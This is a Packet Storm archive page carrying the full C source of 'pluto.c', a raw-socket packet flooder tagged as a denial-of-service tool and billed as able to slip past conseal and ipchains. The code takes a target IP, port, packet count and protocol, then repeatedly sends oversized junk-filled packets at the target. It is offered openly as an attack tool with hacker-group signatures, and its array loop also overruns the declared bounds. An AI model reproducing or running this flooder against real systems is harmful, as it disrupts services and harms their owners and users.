what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

pluto.c

pluto.c
Posted Dec 23, 2000

Pluto.c is a SOCK_RAW flooder which attempts to hide from conseal and ipchains.

tags | denial of service
SHA-256 | 8d9cd489065a7c20ca2164005dc5e8894dd2f18730f6eaf773403c9e662103ea

pluto.c

Change Mirror Download
/* "pluto.c - fluidtech";
"#wolfclan 0wnz u"
"fluidtech - irc.dal.net"
*/

#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/socket.h>
#include <sys/wait.h>

struct outmp {
char out_line[8];
char out_name[8];
long out_time;
};

struct whod {
char wd_vers;
char wd_type;
char wd_pad[2];
int wd_sendtime;
int wd_recvtime;
char *wd_hostname[20][550];
int wd_loadav[3];
int wd_boottime;
struct whoent {
struct outmp we_utmp;
int we_idle;
} wd_we[1024 / sizeof (struct whoent)];
};

int main(int argc, char *argv[])
{
int sockfd;
int i;
struct sockaddr_in sh1t;
int port;
int numbytes;
int version;
int type;
int npack;
int j;
struct whod blah;

char sex0r[]=
"^Blue-Dragon^^Blue-Dragon^^Blue-Dragon^^Blue-Dragon^^Blue-Dragon^^Blue-Dragon^"
"^Blue-Dragon^^Blue-Dragon^^Blue-Dragon^^Blue-Dragon^^Blue-Dragon^^Blue-Dragon^"
"^Blue-Dragon^^Blue-Dragon^^Blue-Dragon^^Blue-Dragon^^Blue-Dragon^^Blue-Dragon^"
"^Blue-Dragon^^Blue-Dragon^^Blue-Dragon^^Blue-Dragon^^Blue-Dragon^^Blue-Dragon^"
"^Blue-Dragon^^Blue-Dragon^^Blue-Dragon^^Blue-Dragon^^Blue-Dragon^^Blue-Dragon^"
"^Blue-Dragon^^Blue-Dragon^^Blue-Dragon^^Blue-Dragon^^Blue-Dragon^^Blue-Dragon^"
"^Blue-Dragon^^Blue-Dragon^^Blue-Dragon^^Blue-Dragon^^Blue-Dragon^^Blue-Dragon^"
"^Blue-Dragon^^Blue-Dragon^^Blue-Dragon^^Blue-Dragon^^Blue-Dragon^^Blue-Dragon^"
"^Blue-Dragon^^Blue-Dragon^^Blue-Dragon^^Blue-Dragon^^Blue-Dragon^^Blue-Dragon^"
"^Blue-Dragon^^Blue-Dragon^^Blue-Dragon^^Blue-Dragon^^Blue-Dragon^^Blue-Dragon^"
"^Blue-Dragon^^Blue-Dragon^^Blue-Dragon^^Blue-Dragon^^Blue-Dragon^^Blue-Dragon^"
"^Blue-Dragon^^Blue-Dragon^^Blue-Dragon^^Blue-Dragon^^Blue-Dragon^^Blue-Dragon^";

if (argc != 5) {
fprintf(stderr,"Usage: %s Ip Port Packet Type",argv[0]);
printf("\nIp : Target Ip \n");
printf("Port : Target Port \n");
printf("#OfPackets : Number Of Packets To Send \n");
printf("Type : Protocol Type \n");

printf("\n#WolfClan - fluidtech\n");
exit(1);
}

port=atoi(argv[2]);
npack=atoi(argv[3]);
type=atoi(argv[4]);

if ((sockfd = socket(AF_INET, SOCK_RAW, type)) == -1)
{
perror("socket");
exit(1);
}
sh1t.sin_family = AF_INET;
sh1t.sin_port = htons(port);
sh1t.sin_addr.s_addr = inet_addr(argv[1]);
bzero(&(sh1t.sin_zero), 8);
bzero(&blah,sizeof(struct whod));

blah.wd_vers=69;
blah.wd_type=69;

for(i=0;i<20;i++)
{
for(j=0;j<570;j++)
{
blah.wd_hostname[i][j]=sex0r+strlen(sex0r);
}
}
for(i=0;i<npack;i++)
{
numbytes=sendto(sockfd, &blah, sizeof(struct whod), 0,(struct sockaddr *)&sh1t, sizeof(struct sockaddr));
if(numbytes>-1)
{
numbytes=sendto(sockfd, &blah, sizeof(struct whod), 0,(struct sockaddr *)&sh1t, sizeof(struct sockaddr));
}
if(numbytes>-1)
{
numbytes=sendto(sockfd, &blah, sizeof(struct whod), 0,(struct sockaddr *)&sh1t, sizeof(struct sockaddr));
}
if(numbytes>-1)
{
numbytes=sendto(sockfd, &blah, sizeof(struct whod), 0,(struct sockaddr *)&sh1t, sizeof(struct sockaddr));
}
}
if(numbytes!=-1)
printf("\nPacket: %d",numbytes);
else
printf("\nFail: %d",numbytes);

close(sockfd);
return 0;
}
Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close